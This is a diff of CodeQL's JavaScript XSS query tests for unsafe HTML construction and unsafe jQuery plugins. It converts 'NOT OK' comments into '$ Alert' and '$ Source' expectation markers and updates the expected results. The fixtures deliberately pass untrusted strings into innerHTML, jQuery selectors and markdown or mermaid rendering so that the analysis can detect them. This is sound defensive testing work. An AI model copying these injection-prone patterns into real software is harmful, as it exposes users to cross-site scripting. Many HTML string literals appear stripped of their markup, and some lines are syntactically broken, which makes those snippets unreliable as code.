Security/CWE-079/UnsafeHtmlConstruction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js index 6a133a747bdd..40f33d8edb3f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js @@ -5,11 +5,11 @@ factory(jQuery); } }(function ($) { - $("" + $.trim("foo") + ""); // OK + $("" + $.trim("foo") + ""); })); -$.fn.myPlugin = function (stuff, options) { - $("#foo").html("" + options.foo + ""); // NOT OK +$.fn.myPlugin = function (stuff, options) { // $ Source + $("#foo").html("" + options.foo + ""); // $ Alert - $("#foo").html("" + stuff + ""); // NOT OK + $("#foo").html("" + stuff + ""); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts index 91e81238605a..7e546c05d103 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts @@ -1,4 +1,4 @@ -export function trivialXss(s: string) { - const html = "" + s + ""; // NOT OK +export function trivialXss(s: string) { // $ Source + const html = "" + s + ""; // $ Alert document.querySelector("#html").innerHTML = html; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts index 4e5e4730547e..a69e6e5626d7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts @@ -1,10 +1,10 @@ -export function trivialXss(s: string) { - const html = "" + s + ""; // NOT OK - this file is recognized as a main file. +export function trivialXss(s: string) { // $ Source + const html = "" + s + ""; // $ Alert - this file is recognized as a main file. document.querySelector("#html").innerHTML = html; } -export function objectStuff(settings: any, i: number) { - document.querySelector("#html").innerHTML = "" + settings + ""; // NOT OK +export function objectStuff(settings: any, i: number) { // $ Source + document.querySelector("#html").innerHTML = "" + settings + ""; // $ Alert var name; if (settings.mySetting && settings.mySetting.length !== 0) { @@ -15,7 +15,7 @@ export function objectStuff(settings: any, i: number) { name = ""; } - document.querySelector("#html").innerHTML = "" + name + ""; // NOT OK + document.querySelector("#html").innerHTML = "" + name + ""; // $ Alert } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts index e28325ce0cf8..3c7ac0103431 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts @@ -1,4 +1,4 @@ -export function trivialXss(s: string) { - const html = "" + s + ""; // NOT OK - this file is not recognized as a main file. +export function trivialXss(s: string) { // $ Source + const html = "" + s + ""; // $ Alert - this file is not recognized as a main file. document.querySelector("#html").innerHTML = html; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js index 01d376a2f8be..78da04582957 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js @@ -1,15 +1,15 @@ -module.exports.xssThroughHTMLConstruction = function (s) { - const html = "" + s + "";// NOT OK +module.exports.xssThroughHTMLConstruction = function (s) { // $ Source + const html = "" + s + "";// $ Alert document.querySelector("#html").innerHTML = html; } -module.exports.xssThroughXMLParsing = function (s) { - const doc = new DOMParser().parseFromString(s, "text/xml"); // NOT OK +module.exports.xssThroughXMLParsing = function (s) { // $ Source + const doc = new DOMParser().parseFromString(s, "text/xml"); // $ Alert document.querySelector("#xml").appendChild(doc.documentElement); } -module.exports.xssThroughMoreComplexXMLParsing = function (s) { - const doc = new DOMParser().parseFromString(s, "text/xml"); // NOT OK +module.exports.xssThroughMoreComplexXMLParsing = function (s) { // $ Source + const doc = new DOMParser().parseFromString(s, "text/xml"); // $ Alert const xml = doc.documentElement; const tmp = document.createElement('span'); @@ -18,14 +18,14 @@ module.exports.xssThroughMoreComplexXMLParsing = function (s) { } const markdown = require('markdown-it')({html: true}); -module.exports.xssThroughMarkdown = function (s) { - const html = markdown.render(s); // NOT OK +module.exports.xssThroughMarkdown = function (s) { // $ Source + const html = markdown.render(s); // $ Alert document.querySelector("#markdown").innerHTML = html; } const striptags = require('striptags'); module.exports.sanitizedHTML = function (s) { - const html = striptags("" + s + ""); // OK + const html = striptags("" + s + ""); document.querySelector("#sanitized").innerHTML = html; } @@ -44,7 +44,7 @@ class Foo { doXss() { // not called here, but still bad. - document.querySelector("#class").innerHTML = "" + this.step + ""; // NOT OK + document.querySelector("#class").innerHTML = "" + this.step + ""; // $ MISSING: Alert - needs localFieldStep } } @@ -53,67 +53,67 @@ module.exports.createsClass = function (s) { return new Foo(s); } -$.fn.xssPlugin = function (options) { +$.fn.xssPlugin = function (options) { // $ Source const defaults = { name: "name" }; const settings = $.extend(defaults, options); return this.each(function () { - $("" + settings.name + "").appendTo(this); // NOT OK + $("" + settings.name + "").appendTo(this); // $ Alert }); } -module.exports.guards = function (attrVal) { - document.querySelector("#id").innerHTML = "\"""; // NOT OK - document.querySelector("#id").innerHTML = "\"""; // OK +module.exports.guards = function (attrVal) { // $ Source + document.querySelector("#id").innerHTML = "\"""; // $ Alert + document.querySelector("#id").innerHTML = "\"""; if (attrVal.indexOf("\"") === -1 && attrVal.indexOf("'") === -1) { - document.querySelector("#id").innerHTML = "\"""; // OK + document.querySelector("#id").innerHTML = "\"""; } } module.exports.intentionalTemplate = function (obj) { - const html = "" + obj.spanTemplate + ""; // OK + const html = "" + obj.spanTemplate + ""; document.querySelector("#template").innerHTML = html; } -module.exports.types = function (val) { +module.exports.types = function (val) { // $ Source if (typeof val === "string") { - $("#foo").html("" + val + ""); // NOT OK + $("#foo").html("" + val + ""); // $ Alert } else if (typeof val === "number") { - $("#foo").html("" + val + ""); // OK + $("#foo").html("" + val + ""); } else if (typeof val === "boolean") { - $("#foo").html("" + val + ""); // OK + $("#foo").html("" + val + ""); } } function createHTML(x) { - return "" + x + ""; // NOT OK + return "" + x + ""; // $ Alert } -module.exports.usesCreateHTML = function (x) { +module.exports.usesCreateHTML = function (x) { // $ Source $("#foo").html(createHTML(x)); } const myMermaid = require('mermaid'); -module.exports.usesCreateHTML = function (x) { - myMermaid.render("id", x, function (svg) { // NOT OK +module.exports.usesCreateHTML = function (x) { // $ Source + myMermaid.render("id", x, function (svg) { // $ Alert $("#foo").html(svg); }); - $("#foo").html(myMermaid.render("id", x)); // NOT OK + $("#foo").html(myMermaid.render("id", x)); // $ Alert - mermaid.render("id", x, function (svg) {// NOT OK + mermaid.render("id", x, function (svg) {// $ Alert $("#foo").html(svg); }); - $("#foo").html(mermaid.render("id", x)); // NOT OK + $("#foo").html(mermaid.render("id", x)); // $ Alert - mermaid.mermaidAPI.render("id", x, function (svg) {// NOT OK + mermaid.mermaidAPI.render("id", x, function (svg) {// $ Alert $("#foo").html(svg); }); } -module.exports.xssThroughMarkdown = function (s) { - const html = markdown.render(s); // NOT OK +module.exports.xssThroughMarkdown = function (s) { // $ Source + const html = markdown.render(s); // $ Alert document.querySelector("#markdown").innerHTML = html; } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts index 0f04e92cdc04..1c50460050cf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts @@ -1,11 +1,11 @@ -export function basicHtmlConstruction(s: string) { - const html = "" + s + ""; // NOT OK +export function basicHtmlConstruction(s: string) { // $ Source + const html = "" + s + ""; // $ Alert document.body.innerHTML = html; } -export function insertIntoCreatedDocument(s: string) { +export function insertIntoCreatedDocument(s: string) { // $ Source const newDoc = document.implementation.createHTMLDocument(""); - newDoc.body.innerHTML = "" + s + ""; // OK - inserted into document disconnected from the main DOM. [INCONSISTENCY] + newDoc.body.innerHTML = "" + s + ""; // $ SPURIOUS: Alert - inserted into document disconnected from the main DOM. } export function id(s: string) { @@ -14,7 +14,7 @@ export function id(s: string) { export function notVulnerable() { const s = id("x"); - const html = "" + s + ""; // OK + const html = "" + s + ""; document.body.innerHTML = html; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.expected b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.ql b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.ql deleted file mode 100644 index d7e452b2a8c1..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.UnsafeJQueryPluginQuery as UnsafeJqueryPlugin diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.expected b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.expected index f246b00d7878..236f3b387fa5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.expected @@ -1,3 +1,27 @@ +#select +| unsafe-jquery-plugin.js:3:5:3:11 | options | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:3:5:3:11 | options | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:5:5:5:18 | options.target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:5:5:5:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:22:6:22:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:22:6:22:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:30:6:30:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:30:6:30:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:36:6:36:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:36:6:36:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:40:6:40:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:40:6:40:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:48:6:48:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:48:6:48:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:52:6:52:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:52:6:52:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:60:6:60:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:60:6:60:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | unsafe-jquery-plugin.js:65:47:65:53 | options | unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:65:19:69:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | unsafe-jquery-plugin.js:71:38:71:44 | options | unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:71:19:74:2 | functio ... ml);\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | unsafe-jquery-plugin.js:76:38:76:44 | options | unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:76:19:78:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:90:6:90:6 | t | unsafe-jquery-plugin.js:84:38:84:44 | options | unsafe-jquery-plugin.js:90:6:90:6 | t | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:84:19:93:2 | functio ... ns);\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:107:5:107:18 | options.target | unsafe-jquery-plugin.js:101:38:101:44 | options | unsafe-jquery-plugin.js:107:5:107:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:101:19:108:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:117:5:117:18 | options.target | unsafe-jquery-plugin.js:114:38:114:44 | options | unsafe-jquery-plugin.js:117:5:117:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:114:19:118:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:122:5:122:18 | options.target | unsafe-jquery-plugin.js:121:40:121:46 | options | unsafe-jquery-plugin.js:122:5:122:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:121:21:123:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:127:6:127:19 | options.target | unsafe-jquery-plugin.js:126:33:126:39 | options | unsafe-jquery-plugin.js:127:6:127:19 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:126:14:128:3 | functio ... ert\\n\\t\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:132:5:132:18 | options.target | unsafe-jquery-plugin.js:131:34:131:40 | options | unsafe-jquery-plugin.js:132:5:132:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:131:15:133:2 | functio ... lert\\n\\t} | '$.fn.affix' plugin | +| unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | unsafe-jquery-plugin.js:135:36:135:42 | options | unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:135:17:137:2 | functio ... lert\\n\\t} | '$.fn.tooltip' plugin | +| unsafe-jquery-plugin.js:157:44:157:59 | options.target.a | unsafe-jquery-plugin.js:153:38:153:44 | options | unsafe-jquery-plugin.js:157:44:157:59 | options.target.a | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:153:19:158:2 | functio ... ties\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:170:6:170:11 | target | unsafe-jquery-plugin.js:160:38:160:44 | options | unsafe-jquery-plugin.js:170:6:170:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:160:19:173:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:179:5:179:18 | options.target | unsafe-jquery-plugin.js:178:27:178:33 | options | unsafe-jquery-plugin.js:179:5:179:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:178:18:180:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:192:19:192:28 | options.of | unsafe-jquery-plugin.js:185:28:185:34 | options | unsafe-jquery-plugin.js:192:19:192:28 | options.of | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:185:18:194:2 | functio ... et);\\n\\t} | '$.fn.position' plugin | edges | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:3:5:3:11 | options | provenance | | | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:5:5:5:11 | options | provenance | | @@ -159,27 +183,3 @@ nodes | unsafe-jquery-plugin.js:186:21:186:30 | options.of | semmle.label | options.of | | unsafe-jquery-plugin.js:192:19:192:28 | options.of | semmle.label | options.of | subpaths -#select -| unsafe-jquery-plugin.js:3:5:3:11 | options | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:3:5:3:11 | options | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:5:5:5:18 | options.target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:5:5:5:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:22:6:22:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:22:6:22:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:30:6:30:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:30:6:30:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:36:6:36:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:36:6:36:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:40:6:40:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:40:6:40:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:48:6:48:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:48:6:48:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:52:6:52:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:52:6:52:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:60:6:60:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:60:6:60:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | unsafe-jquery-plugin.js:65:47:65:53 | options | unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:65:19:69:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | unsafe-jquery-plugin.js:71:38:71:44 | options | unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:71:19:74:2 | functio ... / OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | unsafe-jquery-plugin.js:76:38:76:44 | options | unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:76:19:78:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:90:6:90:6 | t | unsafe-jquery-plugin.js:84:38:84:44 | options | unsafe-jquery-plugin.js:90:6:90:6 | t | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:84:19:93:2 | functio ... ns);\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:107:5:107:18 | options.target | unsafe-jquery-plugin.js:101:38:101:44 | options | unsafe-jquery-plugin.js:107:5:107:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:101:19:108:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:117:5:117:18 | options.target | unsafe-jquery-plugin.js:114:38:114:44 | options | unsafe-jquery-plugin.js:117:5:117:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:114:19:118:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:122:5:122:18 | options.target | unsafe-jquery-plugin.js:121:40:121:46 | options | unsafe-jquery-plugin.js:122:5:122:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:121:21:123:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:127:6:127:19 | options.target | unsafe-jquery-plugin.js:126:33:126:39 | options | unsafe-jquery-plugin.js:127:6:127:19 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:126:14:128:3 | functio ... OK\\n\\t\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:132:5:132:18 | options.target | unsafe-jquery-plugin.js:131:34:131:40 | options | unsafe-jquery-plugin.js:132:5:132:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:131:15:133:2 | functio ... T OK\\n\\t} | '$.fn.affix' plugin | -| unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | unsafe-jquery-plugin.js:135:36:135:42 | options | unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:135:17:137:2 | functio ... T OK\\n\\t} | '$.fn.tooltip' plugin | -| unsafe-jquery-plugin.js:157:44:157:59 | options.target.a | unsafe-jquery-plugin.js:153:38:153:44 | options | unsafe-jquery-plugin.js:157:44:157:59 | options.target.a | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:153:19:158:2 | functio ... NCY]\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:170:6:170:11 | target | unsafe-jquery-plugin.js:160:38:160:44 | options | unsafe-jquery-plugin.js:170:6:170:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:160:19:173:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:179:5:179:18 | options.target | unsafe-jquery-plugin.js:178:27:178:33 | options | unsafe-jquery-plugin.js:179:5:179:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:178:18:180:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:192:19:192:28 | options.of | unsafe-jquery-plugin.js:185:28:185:34 | options | unsafe-jquery-plugin.js:192:19:192:28 | options.of | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:185:18:194:2 | functio ... et);\\n\\t} | '$.fn.position' plugin | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.qlref b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.qlref index 66c19069e074..717ac0c8ff74 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.qlref @@ -1 +1,2 @@ -Security/CWE-079/UnsafeJQueryPlugin.ql \ No newline at end of file +query: Security/CWE-079/UnsafeJQueryPlugin.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js index bda981fe2b7d..315644f407df 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js @@ -1,93 +1,93 @@ (function(){ - $.fn.my_plugin = function my_plugin(options) { - $(options); // NOT OK (or is it?) + $.fn.my_plugin = function my_plugin(options) { // $ Source + $(options); // $ Alert - or is it? - $(options.target); // NOT OK + $(options.target); // $ Alert if (isElement(options.target)) { - $(options.target); // OK + $(options.target); } var target = options.target; if (isElement(target)) { - $(target); // OK + $(target); } if (typeof target != "string") { - $(target); // OK + $(target); } if (target.jquery === undefined) { - $(target); // NOT OK + $(target); // $ Alert } else { - $(target); // OK + $(target); } if (target.jquery !== undefined) { - $(target); // OK + $(target); } else { - $(target); // NOT OK + $(target); // $ Alert } if (typeof target.jquery !== "undefined") { - $(target); // OK + $(target); } else { - $(target); // NOT OK + $(target); // $ Alert } if (typeof target.jquery === "undefined") { - $(target); // NOT OK + $(target); // $ Alert } else { - $(target); // OK + $(target); } if (target.jquery) { - $(target); // OK + $(target); } else { - $(target); // NOT OK + $(target); // $ Alert } if (!target.jquery) { - $(target); // NOT OK + $(target); // $ Alert } else { - $(target); // OK + $(target); } if (!!target.jquery) { - $(target); // OK + $(target); } else { - $(target); // NOT OK + $(target); // $ Alert } }; - $.fn.my_plugin = function my_plugin(element, options) { + $.fn.my_plugin = function my_plugin(element, options) { // $ Source this.$element = $(element); this.options = $.extend({}, options); - if (this.options.parent) this.$parent = $(this.options.parent) // NOT OK + if (this.options.parent) this.$parent = $(this.options.parent) // $ Alert }; - $.fn.my_plugin = function my_plugin(options) { - $(options.foo.bar.baz); // NOT OK - $(options.html); // OK + $.fn.my_plugin = function my_plugin(options) { // $ Source + $(options.foo.bar.baz); // $ Alert + $(options.html); }; - $.fn.my_plugin = function my_plugin(options) { - $(x).appendTo(options.foo.bar.baz); // NOT OK + $.fn.my_plugin = function my_plugin(options) { // $ Source + $(x).appendTo(options.foo.bar.baz); // $ Alert }; $.fn.my_plugin = function my_plugin(options) { - $("#" + options.target); // OK + $("#" + options.target); }; - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source function f(o) { this.o = $.extend({}, o); var t = this.o.target; console.log(t); - $(t); // NOT OK + $(t); // $ Alert } f(options); }; @@ -95,79 +95,79 @@ $.fn.my_plugin = function my_plugin(options) { var target = options.target; if (safe.has(target)) - $(target); // OK + $(target); }; - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source options = $.extend({ menu: '
    ', target: '.my_plugin' }, options); - $(options.menu); // OK - $(options.target); // NOT OK + $(options.menu); + $(options.target); // $ Alert }; $.fn.my_plugin.defaults = { menu: '
